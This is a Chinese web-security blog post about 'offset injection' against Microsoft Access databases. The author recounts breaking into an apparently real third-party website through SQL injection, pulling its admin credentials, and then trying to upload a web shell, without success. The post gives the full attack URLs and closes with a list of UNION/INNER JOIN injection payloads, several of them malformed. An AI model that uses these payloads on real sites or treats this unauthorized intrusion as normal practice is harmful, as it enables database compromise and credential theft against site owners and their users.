首页 > 安全 > 网站安全 >

关于access sql 偏移注入技术实战

2011-03-14

文章作者:F4usT这两天没事,无聊的练习下手工注入。随便找了一个网址输入“”报错!然后and 发现存在注入!然后判断下数据库类型当然是access的了,然后判断 十四个字段http://www.f4le.com/show_new.asp?bh=397%20and%201=2%20union%20

文章作者:F4usT
这两天没事,无聊的练习下手工注入。随便找了一个网址输入“”报错!然后and 发现存在注入!然后判断下数据库类型当然是access的了,然后判断 十四个字段
http://www.f4le.com/show_new.asp?bh=397%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14%20from%20users

然后按常规的思路开始爆用户名,密码字段,但是都不行,然后尝试爆破,但是还是不行,然后百度找了下关于注入的语句,发现便宜注入。尝试、、但不成功,随在群里求助,在这里感谢丶反方向的钟!
他还是用的偏移注入。他发来他的 我才知到我的注入语句写错了。。或者说我只是死套老路子吧。然后用他的注入语句成功获取用户名 密码。
http://www.f4le.com/show_new.asp?bh=394%20and%201=2%20union%20select%20*%20from%20(users%20as%20a%20inner%20join%20users%20as%20b%20o

找到后台登陆,但发现功能过于简单 如图

但是ewe 编辑器提示是hxcms 7.5免费版 有原名 和远程上传 随暗喜,iis6.的服务器,解析漏洞,上传图片发现还是被重命名了,然后测试远程上传的oday,但是名字还是只取文件的后缀然后重命名,郁闷死!所以真的不好拿到shell了,然后想下载7.5的源码看看,但网上没找到7.5免费版的源码,所以只能放弃了 。
其实主要学习的是注入语句关于偏移注入 稍微总结了下
大致的语句如下
and 1=2 union select * from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,2,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,2,3,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,2,3,*-1,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,a.id,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,a.id,b.id,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select *from( from (users as a inner join users as b on a.id=b.id )
and 1=2 union select * from ((select * from admin) as a inner join (select * from admin) as b on a.id=b.id) inner join (select id from admin) as c on c.id=a.id
等等
ps:要灵活运用!!!

相关文章
最新文章
热点推荐